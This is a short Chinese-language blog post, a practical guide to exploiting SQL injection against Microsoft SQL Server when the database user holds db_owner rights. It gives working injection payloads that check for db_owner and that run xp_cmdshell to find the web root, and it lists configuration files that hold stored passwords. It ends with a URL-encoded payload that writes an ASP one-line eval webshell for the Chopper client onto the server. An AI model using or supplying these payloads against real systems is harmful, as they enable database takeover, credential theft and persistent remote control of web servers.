sql server dbowner 权限 实战

Posted 2021-07-12 安全界 的彭于晏

具有dbowner角色的用户，能够对数据库执行所有配置和维护操作。例如创建和删除表、存储过程、视图、函数，甚至删除数据库，还可以给其他用户设置权限。
只有增、删、改权限的用户只限于添加、删除和修改记录，其它操作都会受到限制。
第一步 查看当前网站是否为db_owner 权限
and 1=(select is_member(‘db_owner’) );-- 判断当前数据库用户是否为db_owner 权限
第二步:找出网站路径
1.通过报错或baidu google 等查找 通过搜索引擎收录报错的页面看看里面有没有网站路径

2.通过相关语句
;drop table black;create TABLE black(result varchar(7996) NULL, ID int NOT NULL IDENTITY(1,1))–
删除 在创建一个表
;insert into black exec master . . xp_cmdshell ‘dir /s c:\\1.aspx’–
通过xp_cmdshell扩展存储搜索出路径并插入到创建的表中
and (select result from black where id=1)>0–
然后在通过错误语句爆出插入到字段的路径
常见配置文件下找路径
php.ini 配置信息 php配置信息文件
my.ini mysql配置文件 记录管理员登陆过的mysql用户名和密码
user.MYD 存储mysql.user 表中的数据库链接密码
NETAbase.xml 查看iis虚拟主机配置
http.conf apache 配置文件
sam windows系统初次安装的密码
3 写一句话木马获取webshell
%20;exec%20master…xp_cmdshell%20’Echo%20"<%eval%20request(“chopper”)%>"%20>>%20c:\\wwwtest\\iis-xxser.com–wwwroot\\muma.asp’–
因为刚才得到了网站在服务器中路径所以现在可以通过xp_cmdshell 扩展存储 在这个路径下写进去一句话木马

通过菜刀连接木马
第二种方法
得到网站路径也可以getwebshell 工具 通过差异备份 来插入一句话木马